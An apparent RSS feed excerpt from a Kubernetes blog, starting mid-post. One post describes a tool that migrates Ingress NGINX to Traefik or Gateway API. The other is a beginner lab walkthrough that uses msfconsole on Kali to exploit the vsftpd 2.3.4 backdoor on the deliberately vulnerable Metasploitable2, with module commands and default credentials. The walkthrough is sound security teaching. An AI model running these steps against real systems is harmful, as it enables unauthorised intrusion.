<table style="min-width:75px"><colgroup><col style="min-width:25px"></col><col style="min-width:25px"></col><col style="min-width:25px"></col></colgroup><tbody><tr><th><p>Annotation</p></th><th><p>Traefik</p></th><th><p>Gateway API</p></th></tr><tr><td><p><code>ssl-redirect</code></p></td><td><p>✅ RedirectScheme Middleware</p></td><td><p>✅ HTTPRoute RequestRedirect filter</p></td></tr><tr><td><p><code>force-ssl-redirect</code></p></td><td><p>✅ Permanent redirect</p></td><td><p>✅ 301 HTTPRoute redirect</p></td></tr><tr><td><p><code>enable-cors</code> (all 6 fields)</p></td><td><p>✅ Headers Middleware</p></td><td><p>⚠️ Manual ResponseHeaderModifier (no native CORS filter in v1)</p></td></tr><tr><td><p><code>auth-url</code> (ForwardAuth)</p></td><td><p>✅ ForwardAuth Middleware</p></td><td><p>⚠️ SecurityPolicy (Envoy ext-auth)</p></td></tr><tr><td><p><code>limit-rps</code> / <code>limit-rpm</code></p></td><td><p>✅ RateLimit Middleware</p></td><td><p>⚠️ BackendTrafficPolicy (Envoy extension)</p></td></tr><tr><td><p><code>whitelist-source-range</code></p></td><td><p>✅ IPAllowList Middleware</p></td><td><p>⚠️ HTTPRouteMatch source IP (limited)</p></td></tr><tr><td><p><code>affinity: cookie</code> (sticky sessions)</p></td><td><p>✅ Service sticky annotation</p></td><td><p>⚠️ BackendLBPolicy SessionPersistence (v1.1)</p></td></tr><tr><td><p><code>canary</code> + <code>canary-weight</code></p></td><td><p>✅ Weighted service split</p></td><td><p>✅ HTTPRoute weighted backendRefs</p></td></tr><tr><td><p><code>rewrite-target</code></p></td><td><p>✅ ReplacePath/AddPrefix</p></td><td><p>✅ URLRewrite filter</p></td></tr><tr><td><p><code>proxy-read-timeout</code></p></td><td><p>⚠️ ServersTransport CRD</p></td><td><p>⚠️ HTTPRoute spec.rules[].timeouts</p></td></tr><tr><td><p><code>configuration-snippet</code></p></td><td><p>❌ Not supported (security)</p></td><td><p>❌ Not supported</p></td></tr><tr><td><p><code>session-cookie-samesite</code></p></td><td><p>✅ Sticky cookie</p></td><td><p>❌ Not in BackendLBPolicy spec</p></td></tr></tbody></table>

<p>The tool shows you exactly which category each annotation falls into: fully supported (just apply the generated YAML), partial (the YAML is generated, but read the note about what's different), or unsupported (manual work required, with guidance on the best alternative).</p>
<hr />
<h2>Installation</h2>
<pre><code class="language-bash"># macOS arm64
curl -L https://github.com/saiyam1814/ing-switch/releases/latest/download/ing-switch-darwin-arm64 -o ing-switch
chmod +x ing-switch &amp;&amp; sudo mv ing-switch /usr/local/bin/

# Linux amd64
curl -L https://github.com/saiyam1814/ing-switch/releases/latest/download/ing-switch-linux-amd64 -o ing-switch
chmod +x ing-switch &amp;&amp; sudo mv ing-switch /usr/local/bin/
</code></pre>
<p>Or build from source:</p>
<pre><code class="language-bash">git clone https://github.com/saiyam1814/ing-switch.git
cd ing-switch
make build   # builds React UI then embeds it in the Go binary
./ing-switch --help
</code></pre>
<hr />
<h2>The Dashboard</h2>
<p>The easiest way to understand what <code>ing-switch</code> does is to open the UI:</p>
<pre><code class="language-bash">ing-switch ui   # opens at localhost:8080
</code></pre>
<h3>Page 1: Detect</h3>
<p>The first page scans your cluster and discovers every Ingress resource across all namespaces, identifies the controller type and version, and flags each ingress by complexity.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/9dfd53cb-7cd4-464d-a8e8-d76b06489710.png" alt="" style="display:block;margin:0 auto" />

<p><em>The tool shows a countdown banner — Ingress NGINX retires March 2026 — and lets you scope the scan to a specific namespace or scan everything.</em></p>
<p>After clicking <strong>Scan Cluster</strong>, the tool connects to your cluster via kubeconfig and enumerates every <code>networking.k8s.io/v1 Ingress</code> object. In my test cluster (a vcluster running 11 production-realistic ingresses), the sidebar updated immediately to show "11 ingresses · retiring · ingress-nginx":</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/adf1f056-5f49-4bbb-a693-4aba846ef71e.png" alt="" style="display:block;margin:0 auto" />

<p><em>The sidebar shows your cluster name, ingress count, and controller status. "Retiring" badge means the detected controller is Ingress NGINX.</em></p>
<h3>Page 2: Analyze</h3>
<p>The Analyze page is where you decide your migration target. You pick between <strong>Traefik v3</strong> (labeled "Lowest friction") or <strong>Gateway API via Envoy Gateway</strong> (labeled "Future-proof standard"), then click <strong>Analyze Compatibility</strong>.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/6cccda7e-dbb3-4d9f-8863-36076eb7b83b.png" alt="" style="display:block;margin:0 auto" />

<p>The engine runs through every annotation on every ingress and produces a per-ingress compatibility matrix. Each annotation gets a status badge:</p>
<ul>
<li><p><strong>Green (supported)</strong> — the generated YAML covers this fully; just apply it</p>
</li>
<li><p><strong>Yellow (partial)</strong> — the feature works but with limitations; the note explains exactly what's different</p>
</li>
<li><p><strong>Red (unsupported)</strong> — no direct equivalent exists; the tool explains the best available workaround</p>
</li>
</ul>
<p>This is the output that replaces weeks of reading changelogs and GitHub issues.</p>
<h3>Page 3: Migrate</h3>
<p>The Migrate page generates the complete output directory of Kubernetes manifests. Click <strong>Generate Migration Files</strong> and the tool writes every file needed for a zero-downtime cutover.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/b5656123-e68e-41d3-83e7-8a13885eb832.png" alt="" style="display:block;margin:0 auto" />

<p><em>The checklist walks you through every step in order, so you can't accidentally skip a dependency (like applying GatewayClass before HTTPRoutes).</em></p>
<p>After generation, each step gains <strong>View File</strong>, <strong>Dry-run</strong>, and <strong>Apply</strong> buttons:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/e8f69606-1790-4d40-8a59-3bb3701a686f.png" alt="" style="display:block;margin:0 auto" />

<p><em>The tool generated 27 migration files for Traefik across 11 ingresses. Each checklist item links to the file it creates, and you can preview the YAML before applying.</em></p>
<p>The <strong>Gaps tab</strong> gives you the executive summary — which ingresses are fully compatible, which have auto-generated workarounds, and which need manual review:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/2477c587-a5c8-463a-a2ca-2b0e91e29e99.png" alt="" style="display:block;margin:0 auto" />

<p><em>"Needs Review" ingresses are listed with the specific annotations that require manual attention, so you know exactly what work remains before cutover.</em></p>
<h3>Page 4: Validate</h3>
<p>After applying the generated manifests, the Validate page gives you a structured checklist of post-migration checks and lets you run live validation against the cluster.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/85281d50-0a67-4c7e-abcd-0c7b127af988.png" alt="" style="display:block;margin:0 auto" />

<p><em>The checklist covers TLS verification, auth testing, rate limit validation, canary routing verification, and a 24-hour monitoring window before removing NGINX.</em></p>
<hr />
<h2>The CLI: same power, no browser</h2>
<p>Everything the UI does is also available as CLI commands, which makes it scriptable and CI-friendly:</p>
<pre><code class="language-bash"># Scan your cluster
$ ing-switch scan
Cluster: production-cluster
Controller: ingress-nginx v1.9.4 (namespace: ingress-nginx)

NAMESPACE    NAME              HOSTS                     ANNOTATIONS  TLS
ecommerce    ecommerce-shop    shop.example.com          13           yes
security     payment-api       payments.example.com      6            yes
messaging    realtime-chat     chat.example.com          2            yes
...
11 ingresses found across 6 namespaces

# Analyze annotation compatibility for Gateway API
$ ing-switch analyze --target gateway-api
INGRESS                       SUPPORTED   PARTIAL   UNSUPPORTED
ecommerce/ecommerce-shop      6           5         2
security/payment-api          3           2         1
...

# Generate all migration manifests
$ ing-switch migrate --target traefik --output-dir ./migration
Generated 27 files across 11 ingresses

migration/
├── 00-migration-report.md      # Full annotation analysis
├── 01-install-traefik/         # Helm install script + values.yaml
├── 02-middlewares/             # Traefik Middleware CRDs
├── 03-ingresses/               # Updated Ingress resources
├── 04-verify.sh                # Test script per hostname
├── 05-dns-migration.md         # DNS cutover guide
└── 06-cleanup/                 # Remove NGINX after cutover
</code></pre>
<hr />
<h2>How it handles the tricky cases</h2>
<p>Three annotation scenarios trip up almost every migration, and <code>ing-switch</code> handles all of them:</p>
<h3>HTTP→HTTPS redirect</h3>
<p>The naive approach — putting both a RequestRedirect filter and a backend rule in the same HTTPRoute — causes a redirect loop where HTTPS traffic gets redirected back to HTTPS. <code>ing-switch</code> generates <strong>two separate HTTPRoutes</strong> using Gateway API <code>sectionName</code> to attach each route to the correct listener:</p>
<pre><code class="language-yaml"># &lt;name&gt;-redirect: attached to HTTP listener only (sectionName: http)
# Returns 301/302 for all incoming HTTP requests

# &lt;name&gt;: attached to HTTPS listener (sectionName: https-0)
# Routes HTTPS traffic to your backends
</code></pre>
<p>This is the correct pattern but requires knowing the Gateway API spec deeply enough to spot the constraint. The tool just does it right.</p>
<h3>Regex paths</h3>
<p>NGINX annotations like <code>use-regex: "true"</code> and paths like <code>/app(/|$)(.*)</code> are common. Gateway API's <code>PathPrefix</code> type rejects regex characters. <code>ing-switch</code> auto-detects paths containing <code>(</code>, <code>)</code>, <code>|</code>, <code>[</code>, <code>]</code> and switches them to <code>PathMatch.RegularExpression</code> type — even when the <code>use-regex</code> annotation is absent.</p>
<h3>Timeout constraints</h3>
<p><code>proxy-read-timeout: 300</code> and <code>proxy-connect-timeout: 5</code> look straightforward to map. But Gateway API enforces <code>backendRequest ≤ request</code>, and mapping read→backendRequest (300s) and connect→request (5s) would violate that constraint. <code>ing-switch</code> maps only <code>proxy-read-timeout → backendRequest</code> and intentionally omits <code>proxy-connect-timeout</code>, with a note explaining why.</p>
<hr />
<h2>Generated output: Gateway API example</h2>
<p>For a single ingress with SSL redirect, session affinity, and rate limiting, the Gateway API migration generates:</p>
<pre><code class="language-plaintext">migration/
├── 00-migration-report.md
├── 01-install-gateway-api-crds/
│   └── install.sh
├── 02-install-envoy-gateway/
│   ├── helm-install.sh
│   └── values.yaml
├── 03-gateway/
│   ├── gatewayclass.yaml      # GatewayClass (Envoy Gateway)
│   └── gateway.yaml           # Gateway: HTTP + HTTPS listeners
├── 04-httproutes/
│   ├── ecommerce-ecommerce-shop-redirect.yaml   # HTTP→HTTPS (sectionName: http)
│   └── ecommerce-ecommerce-shop.yaml            # HTTPS backend (sectionName: https-0)
├── 05-policies/
│   └── ecommerce-ecommerce-shop-btp.yaml        # BackendTrafficPolicy (rate limit)
├── 06-verify.sh
└── 07-cleanup/
    └── remove-nginx.sh
</code></pre>
<hr />
<h2>Example ingresses</h2>
<p>The repo includes 11 production-realistic NGINX Ingress configurations covering every major annotation category you're likely to have in a real cluster:</p>
<table style="min-width:50px"><colgroup><col style="min-width:25px"></col><col style="min-width:25px"></col></colgroup><tbody><tr><th><p>File</p></th><th><p>Covers</p></th></tr><tr><td><p><code>01-basic-routing.yaml</code></p></td><td><p>Path routing, TLS termination</p></td></tr><tr><td><p><code>02-ssl-tls.yaml</code></p></td><td><p>SSL redirect, HSTS, force-ssl</p></td></tr><tr><td><p><code>03-auth-external.yaml</code></p></td><td><p>External auth (auth-url, auth-response-headers)</p></td></tr><tr><td><p><code>04-session-affinity.yaml</code></p></td><td><p>Sticky cookies (all 8 session-cookie-* fields)</p></td></tr><tr><td><p><code>05-canary.yaml</code></p></td><td><p>Canary by weight, header, cookie</p></td></tr><tr><td><p><code>06-cors.yaml</code></p></td><td><p>Full CORS (all 6 cors-* annotations)</p></td></tr><tr><td><p><code>07-path-rewrite-regex.yaml</code></p></td><td><p>Regex routing, rewrite-target capture groups</p></td></tr><tr><td><p><code>08-rate-limit-ip.yaml</code></p></td><td><p>Rate limiting, IP allowlist/denylist</p></td></tr><tr><td><p><code>09-websocket.yaml</code></p></td><td><p>WebSocket upgrade</p></td></tr><tr><td><p><code>10-grpc.yaml</code></p></td><td><p>gRPC passthrough</p></td></tr><tr><td><p><code>11-full-featured.yaml</code></p></td><td><p>All of the above combined</p></td></tr></tbody></table>

<p>You can apply them to a test cluster and run the full migration against them:</p>
<pre><code class="language-bash">kubectl apply -f examples/
ing-switch migrate --target gateway-api --output-dir ./migration-examples
kubectl apply --dry-run=client -f ./migration-examples/03-gateway/
kubectl apply --dry-run=client -f ./migration-examples/04-httproutes/
</code></pre>
<hr />
<h2>Zero-downtime migration strategy</h2>
<p>The tool is designed around a zero-downtime approach:</p>
<ol>
<li><p><strong>Install the new controller alongside NGINX</strong> — both run simultaneously; DNS still points to NGINX</p>
</li>
<li><p><strong>Apply generated manifests</strong> — Middlewares, HTTPRoutes, Gateway</p>
</li>
<li><p><strong>Verify the new controller</strong> — run <code>06-verify.sh</code> to test each hostname against the new IP</p>
</li>
<li><p><strong>Shift DNS</strong> — update your DNS records to point to the new controller's LoadBalancer IP</p>
</li>
<li><p><strong>Monitor for 24 hours</strong> — watch for 5xx errors, auth failures, session issues</p>
</li>
<li><p><strong>Remove NGINX</strong> — run <code>06-cleanup/remove-nginx.sh</code></p>
</li>
</ol>
<p>The Migrate page's step-by-step checklist mirrors this order and locks steps until their dependencies are checked off.</p>
<hr />
<h2>Try it</h2>
<pre><code class="language-bash"># Install
curl -L https://github.com/saiyam1814/ing-switch/releases/latest/download/ing-switch-darwin-arm64 -o ing-switch
chmod +x ing-switch &amp;&amp; sudo mv ing-switch /usr/local/bin/

# Point at your cluster
export KUBECONFIG=~/.kube/config

# Open the visual UI
ing-switch ui
</code></pre>
<p>The source, examples, and annotation mapping database are at <a href="https://github.com/saiyam1814/ing-switch"><strong>github.com/saiyam1814/ing-switch</strong></a>.</p>
<p>The annotation mapping database lives in <code>pkg/analyzer/compatibility.go</code> (status + target resource per annotation) and <code>pkg/server/guides.go</code> (human-readable what/fix/example per annotation). PRs for additional annotation mappings are welcome.</p>
<hr />
<p><em>March 2026 is closer than it looks. The tools are ready.</em></p>
]]></content:encoded></item><item><title><![CDATA[Exploiting Metasploitable2 Using msfconsole (Kali Linux Lab)]]></title><description><![CDATA[Exploiting Metasploitable2 Using msfconsole (Kali Linux Lab)
Introduction
msfconsole is the heart of the Metasploit Framework and one of the most powerful tools used by penetration testers to identify, exploit, and validate security vulnerabilities. ...]]></description><link>https://blog.kubesimplify.com/exploiting-metasploitable2-using-msfconsole-kali-linux-lab</link><guid isPermaLink="true">https://blog.kubesimplify.com/exploiting-metasploitable2-using-msfconsole-kali-linux-lab</guid><category><![CDATA[cybersecurity]]></category><category><![CDATA[Msfconsole]]></category><category><![CDATA[metasploitable2]]></category><category><![CDATA[Web Exploitation]]></category><dc:creator><![CDATA[Ankit Kumar]]></dc:creator><pubDate>Sat, 17 Jan 2026 16:15:22 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1768665637972/12f25f19-87fa-4976-a328-5182fbed203e.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-exploiting-metasploitable2-using-msfconsole-kali-linux-lab"><strong>Exploiting Metasploitable2 Using</strong> <code>msfconsole</code> (Kali Linux Lab)</h2>
<h2 id="heading-introduction"><strong>Introduction</strong></h2>
<p><code>msfconsole</code> is the heart of the <strong>Metasploit Framework</strong> and one of the most powerful tools used by penetration testers to <strong>identify, exploit, and validate security vulnerabilities</strong>. In real-world security assessments as well as Capture The Flag (CTF) challenges, <code>msfconsole</code> is often used to automate and streamline exploitation workflows.</p>
<p>In this blog, we will explore how to use <code>msfconsole</code> from <strong>Kali Linux</strong> to exploit an intentionally vulnerable machine, <strong>Metasploitable2</strong>, in a safe and controlled lab environment.</p>
<p>Both machines are hosted on <strong>Oracle VM VirtualBox</strong> and configured on the same internal network. This setup allows us to simulate real attack scenarios while maintaining proper ethical boundaries.</p>
<p>The goal of this blog is to:</p>
<ul>
<li><p>Understand what <code>msfconsole</code> is and why it is used</p>
</li>
<li><p>Learn how attackers interact with vulnerable services using Metasploit</p>
</li>
<li><p>Gain hands-on experience with a realistic exploitation lab</p>
</li>
</ul>
<blockquote>
<p><strong><em>Note:</em></strong> <em>All demonstrations in this blog are performed on machines owned by us or intentionally designed to be vulnerable. Never use these techniques on unauthorized systems.</em></p>
</blockquote>
<p>In the next section, we will briefly look at the lab architecture before launching <code>msfconsole</code> and beginning the exploitation process.</p>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*F-1r_D3nLsU0NgJxadHHuA.png" alt /></p>
<h2 id="heading-setting-up-msfconsole-and-metasploitable2-step-by-step-lab-setup"><strong>Setting Up</strong> <code>msfconsole</code> and Metasploitable2 (Step-by-Step Lab Setup)</h2>
<p>Before launching any exploitation using <code>msfconsole</code>, we must ensure that <strong>both the attacker and the vulnerable target are properly set up and reachable</strong>. This section covers the <strong>complete setup process</strong> for <code>msfconsole</code> on Kali Linux and the Metasploitable2 vulnerable server.</p>
<h2 id="heading-1-setting-up-the-attacker-machine-kali-linux"><strong>1. Setting Up the Attacker Machine (Kali Linux)</strong></h2>
<h2 id="heading-why-kali-linux"><strong>Why Kali Linux?</strong></h2>
<p><strong>Kali Linux</strong> comes pre-installed with hundreds of penetration testing tools, including the <strong>Metasploit Framework</strong>.</p>
<h2 id="heading-verify-metasploit-installation"><strong>Verify Metasploit Installation</strong></h2>
<p>On Kali, Metasploit is installed by default. To verify:</p>
<pre><code class="lang-plaintext">msfconsole --version
</code></pre>
<p><img src="https://miro.medium.com/v2/resize:fit:1250/1*yYXvf1oFpRK4eLEfj9mdWA.png" alt /></p>
<p>If Metasploit is installed correctly, you will see version details.</p>
<p>— — — — — — — — — — — — — — — — —</p>
<h2 id="heading-start-msfconsole"><strong>Start</strong> <code>msfconsole</code></h2>
<pre><code class="lang-plaintext">msfconsole
</code></pre>
<p>On first launch, Metasploit may:</p>
<ul>
<li><p>Initialize its database</p>
</li>
<li><p>Create required configuration files</p>
</li>
</ul>
<p>You should now see the familiar <code>msf6 &gt;</code> prompt.</p>
<p>This confirms that <code>msfconsole</code> <strong>is ready to use</strong>.</p>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*2R285OLEWTQFtpGtItnnVQ.png" alt /></p>
<p>— — — — — — — — — — — — — — — — —</p>
<h2 id="heading-2-setting-up-the-target-machine-metasploitable2"><strong>2. Setting Up the Target Machine (Metasploitable2)</strong></h2>
<h2 id="heading-what-is-metasploitable2"><strong>What is Metasploitable2?</strong></h2>
<p><strong>Metasploitable2</strong> is a deliberately vulnerable Linux machine created for practicing penetration testing techniques.</p>
<h2 id="heading-start-metasploitable2-vm"><strong>Start Metasploitable2 VM</strong></h2>
<ul>
<li><p>Launch Metasploitable2 in <strong>Oracle VM VirtualBox</strong></p>
</li>
<li><p>Wait until it boots to the login screen</p>
</li>
</ul>
<h2 id="heading-default-credentials"><strong>Default Credentials</strong></h2>
<pre><code class="lang-plaintext">Username: msfadmin
Password: msfadmin
</code></pre>
<p>Login successfully to access the system.</p>
<h2 id="heading-check-ip-address-of-metasploitable2"><strong>Check IP Address of Metasploitable2</strong></h2>
<pre><code class="lang-plaintext">ifconfig
</code></pre>
<p>Example output:</p>
<pre><code class="lang-plaintext">inet addr:192.168.56.101
</code></pre>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*orC8wVFlmX8C9S_saVqHyQ.png" alt /></p>
<p><strong>Note this IP address</strong>, as it will be used as the target (<code>RHOSTS</code>) inside <code>msfconsole</code>.</p>
<p>— — — — — — — — — — — — — — — — —</p>
<h2 id="heading-3-ensure-both-machines-are-on-the-same-network"><strong>3. Ensure Both Machines Are on the Same Network</strong></h2>
<p>Both VMs must be configured with:</p>
<ul>
<li><p><strong>Network Adapter:</strong> Host-only Adapter</p>
</li>
<li><p><strong>Name:</strong> VirtualBox Host -Only Ethernet Adapter</p>
</li>
</ul>
<p>This ensures:</p>
<ul>
<li><p>Kali ↔ Metasploitable2 communication</p>
</li>
<li><p>No internet exposure (safe lab)</p>
</li>
</ul>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*jw_6awLbGPXPpHGiSwUheg.png" alt /></p>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*4YuIMsvhpt9eC4OBsvdfbg.png" alt /></p>
<p>— — — — — — — — — — — — — — — — —</p>
<h2 id="heading-4-test-connectivity-very-important"><strong>4. Test Connectivity (Very Important)</strong></h2>
<h2 id="heading-from-kali-linux"><strong>From Kali Linux:</strong></h2>
<pre><code class="lang-plaintext">ping 192.168.56.101
</code></pre>
<p>If you receive replies, your lab network is working correctly.</p>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*GfrW8rPEuFozFSKXF6kvbQ.png" alt /></p>
<p>— — — — — — — — — — — — — — — — —</p>
<h2 id="heading-5-confirm-target-visibility-using-nmap"><strong>5. Confirm Target Visibility Using Nmap</strong></h2>
<p>Before using Metasploit, attackers always enumerate first.</p>
<pre><code class="lang-plaintext">nmap -sV 192.168.56.101
</code></pre>
<p>You should see multiple <strong>intentionally vulnerable services</strong>, such as</p>
<ul>
<li><p>FTP (vsftpd 2.3.4)</p>
</li>
<li><p>SSH</p>
</li>
<li><p>Samba</p>
</li>
<li><p>Tomcat</p>
</li>
</ul>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*URDqkjKlFLdGB6D8vvClcg.png" alt /></p>
<p>This confirms that <strong>Metasploitable2 is ready for exploitation</strong>.</p>
<h2 id="heading-setup-checklist"><strong>Setup Checklist</strong></h2>
<p>✔ Kali Linux boots successfully<br />✔ <code>msfconsole</code> launches without errors<br />✔ Metasploitable2 is accessible<br />✔ Both machines are on the same subnet<br />✔ Ping &amp; Nmap scans work</p>
<p>Once all checks pass, your lab is <strong>fully prepared</strong>.</p>
<h2 id="heading-basic-msfconsole-commands-getting-comfortable-with-the-interface"><strong>Basic</strong> <code>msfconsole</code> Commands (Getting Comfortable with the Interface)</h2>
<p>Before jumping into exploitation, it’s important to understand the <strong>basic operating system–style commands</strong> and navigation used inside <code>msfconsole</code>. This section helps beginners feel confident while working in the Metasploit environment.</p>
<p>We are using <strong>Kali Linux</strong> with the <strong>Metasploit Framework</strong>.</p>
<h2 id="heading-starting-msfconsole"><strong>Starting</strong> <code>msfconsole</code></h2>
<p>Open a terminal in Kali Linux and run:</p>
<pre><code class="lang-plaintext">msfconsole
</code></pre>
<p>Once loaded, you will see:</p>
<pre><code class="lang-plaintext">msf6 &gt;
</code></pre>
<p>This prompt indicates that <code>msfconsole</code> is ready to accept commands.</p>
<h2 id="heading-getting-help-in-msfconsole"><strong>Getting Help in</strong> <code>msfconsole</code></h2>
<h2 id="heading-show-all-commands"><strong>Show All Commands</strong></h2>
<pre><code class="lang-plaintext">help
</code></pre>
<p>or simply:</p>
<pre><code class="lang-plaintext">?
</code></pre>
<p>This lists all available commands, similar to using <code>help</code> in an operating system shell.</p>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*3Srbz0J8FUP1JeGKlzyaDA.png" alt /></p>
<h2 id="heading-navigation-commands-os-like-basics"><strong>Navigation Commands (OS-Like Basics)</strong></h2>
<p>CommandDescription<code>pwd</code>Shows the current module path<code>cd</code>Change module directory<code>ls</code>List available modules<code>clear</code>Clear the screen</p>
<p>Example:</p>
<pre><code class="lang-plaintext">pwd
ls
</code></pre>
<p>These commands work <strong>inside Metasploit</strong>, not the Linux filesystem.</p>
<h2 id="heading-searching-for-modules"><strong>Searching for Modules</strong></h2>
<p>One of the most used commands:</p>
<pre><code class="lang-plaintext">search &lt;keyword&gt;
</code></pre>
<p>Example:</p>
<pre><code class="lang-plaintext">search ftp
search samba
search vsftpd
</code></pre>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*_59RCXTD8OlOBxmtHTKWTw.png" alt /></p>
<p>This helps you quickly find:</p>
<ul>
<li><p>Exploits</p>
</li>
<li><p>Auxiliary scanners</p>
</li>
<li><p>Payloads</p>
</li>
</ul>
<h2 id="heading-understanding-module-types"><strong>Understanding Module Types</strong></h2>
<p>Metasploit is organized into modules:</p>
<p>Metasploit is organized into different <strong>module types</strong>, each designed for a specific purpose in the penetration testing lifecycle.</p>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*mup8HD7Ny-wJB_UHIm-wsA.png" alt /></p>
<p>You can list them using:</p>
<pre><code class="lang-plaintext">ls exploit
ls auxiliary
</code></pre>
<h2 id="heading-using-a-module"><strong>Using a Module</strong></h2>
<p>To select a module:</p>
<pre><code class="lang-plaintext">use exploit/unix/ftp/vsftpd_234_backdoor
</code></pre>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*BOa3f7W203Dorp7kN5ly0g.png" alt /></p>
<p>Once selected, the prompt changes to:</p>
<pre><code class="lang-plaintext">msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt;
</code></pre>
<p>This tells you <strong>which module is currently active</strong>.</p>
<h2 id="heading-viewing-amp-setting-options"><strong>Viewing &amp; Setting Options</strong></h2>
<h2 id="heading-show-required-options"><strong>Show Required Options</strong></h2>
<pre><code class="lang-plaintext">show options
</code></pre>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*YQCTkTtyTuH2KCRHknxBog.png" alt /></p>
<h2 id="heading-set-target-ip"><strong>Set Target IP</strong></h2>
<pre><code class="lang-plaintext">set RHOSTS 192.168.56.101
</code></pre>
<h2 id="heading-set-port-if-needed"><strong>Set Port (if needed)</strong></h2>
<pre><code class="lang-plaintext">set RPORT 21
</code></pre>
<p>To verify:</p>
<pre><code class="lang-plaintext">show options
</code></pre>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*XWEtzl5SBnYN4wkrQJPeXA.png" alt /></p>
<h2 id="heading-running-a-module"><strong>Running a Module</strong></h2>
<pre><code class="lang-plaintext">run
</code></pre>
<p>or</p>
<pre><code class="lang-plaintext">exploit
</code></pre>
<p>Both commands do the same thing.</p>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*H9vWWSHvNAf6eQbcVLjrLQ.png" alt /></p>
<h2 id="heading-session-management-basics"><strong>Session Management Basics</strong></h2>
<p>After successful exploitation:</p>
<pre><code class="lang-plaintext">sessions
</code></pre>
<p>Interact with a session:</p>
<pre><code class="lang-plaintext">sessions -i 1
</code></pre>
<p>Exit session:</p>
<p>Press enter or click to view image in full size</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*mYxSH7v_A7HnR1W6QTTkbw.png" alt /></p>
<pre><code class="lang-plaintext">exit
</code></pre>
<h2 id="heading-exiting-modules-amp-msfconsole"><strong>Exiting Modules &amp;</strong> <code>msfconsole</code></h2>
<p>In Metasploit, use <code>back</code> to leave the current module and return to the main console. Use <code>quit</code> or <code>exit</code> to close <code>msfconsole</code> completely.</p>
<h2 id="heading-key-takeaways"><strong>Key Takeaways</strong></h2>
<p>✔ <code>msfconsole</code> feels like a mini operating system<br />✔ <code>search</code>, <code>use</code>, and <code>show options</code> are core commands<br />✔ Always understand a module before running it<br />✔ Enumeration comes before exploitation</p>
<h2 id="heading-conclusion"><strong>Conclusion</strong></h2>
<p>In this blog, we explored how <code>msfconsole</code>, the core interface of the <strong>Metasploit Framework</strong>, can be used to exploit a vulnerable <strong>FTP service</strong> on <strong>Metasploitable2</strong> from an attacker machine running <strong>Kali Linux</strong>.</p>
<p>Starting from proper lab setup and network configuration, we moved through the essential stages of a penetration test: <strong>service enumeration, exploit selection, configuration, and execution</strong>. By exploiting the outdated <code>vsftpd 2.3.4</code> service, we demonstrated how a single vulnerable service can lead to <strong>full system compromise</strong> when basic security practices are ignored.</p>
<p>This exercise highlights several important lessons:</p>
<ul>
<li><p>Enumeration is more important than exploitation</p>
</li>
<li><p>Outdated services pose serious security risks</p>
</li>
<li><p>Automation tools like <code>msfconsole</code> must be used with understanding, not blindly</p>
</li>
<li><p>Ethical hacking is about <strong>learning and improving security</strong>, not breaking systems</p>
</li>
</ul>
<p>Practicing in a controlled environment like Metasploitable2 helps build a strong foundation for <strong>CTFs, real-world penetration testing, and defensive security awareness</strong>.</p>
<p>In future labs, this knowledge can be extended to:</p>
<ul>
<li><p>Exploiting other services such as Samba and Tomcat</p>
</li>
<li><p>Using Meterpreter for advanced post-exploitation</p>
</li>
<li><p>Understanding how blue teams detect and prevent such attacks</p>
</li>
</ul>
<blockquote>
<p><strong><em>Always remember:</em></strong> <em>with great power comes great responsibility. Use these skills only where you have explicit permission.</em></p>
</blockquote>
<p>Follow Kubesimplify on <a target="_blank" href="https://blog.kubesimplify.com/"><strong>Hashnode</strong></a><a target="_blank" href="https://blog.kubesimplify.com/">, <strong>Twitte</strong></a><a target="_blank" href="https://twitter.com/kubesimplify"><strong>r/X</strong></a> <a target="_blank" href="https://twitter.com/kubesimplify">and <strong>Link</strong></a><a target="_blank" href="https://www.linkedin.com/company/kubesimplify"><strong>edIn</strong></a><a target="_blank" href="https://www.linkedin.com/company/kubesimplify">. Join o</a>ur <a target="_blank" href="https://kubesimplify.com/discord"><strong>Discord server</strong></a> <a target="_blank" href="https://kubesimplify.com/discord">to learn with</a> us!</p>
]]></content:encoded></item></channel></rss>